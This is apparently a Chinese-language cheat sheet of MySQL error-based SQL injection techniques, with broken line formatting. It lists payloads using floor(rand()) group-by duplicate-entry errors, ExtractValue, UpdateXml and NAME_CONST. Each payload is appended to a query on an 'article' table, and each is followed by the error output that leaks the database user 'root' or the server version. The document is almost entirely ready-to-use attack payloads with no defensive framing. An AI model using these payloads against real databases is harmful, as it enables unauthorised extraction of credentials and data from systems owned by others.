1、floor
方法一:
-
mysql
>
select
*
from article
where
id
=
1
and
(
select
1
from
(
select count
(*),
concat
(
version
(),
floor
(
rand
(
0
)*
2
))
x from information_schema
.
tables group by x
)
a
);
-
mysql
>
select
*
from article
where
id
=
1
and
(
select
1
from
(
select count
(*),
concat
((
select user from mysql.user limit 1
),
floor
(
rand
(
0
)*
2
))
x from information_schema
.
tables group by x
)
a
);
-
ERROR
1062
(
23000
):
Duplicate
entry
'root1'
for
key
'group_key'
方法二:
-
mysql> select
*
from article
where
id
=
1
and
(
select count
(*)
from
(
select
1
union
select null
union
select
!
1
)
x group by concat
((
select user from mysql.user limit
1
),
floor
(
rand
(
0
)*
2
)));
-
ERROR
1062
(
23000
):
Duplicate
entry
'root1'
for
key
'group_key'
2、ExtractValue
-
mysql
>
select
*
from article
where
id
=
1
and extractvalue
(
1
,
concat
(
0x5c
,(
select user from mysql
.
user limit
1
)));
-
ERROR
1105
(
HY000
):
XPATH syntax error
:
'\root'
3、UpdateXml
-
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select user from mysql.user limit 1),0x5e24),1));
结果:
-
ERROR
1105
(
HY000
):
XPATH syntax error
:
'^$root^$'
4、Name_cast
-
mysql
>
select
*
from article
where
id
=
1
and exists
(
select
*
from
(
select
*
from
(
select name_const
(@
@version
,
0
))
a join
(
select name_const
(@
@version
,
0
))
b
)
c
);
-
ERROR
1210
(
HY000
):
Incorrect
arguments to NAME_CONST
<5.5.20-log版本提示错误,低版本5.0可以>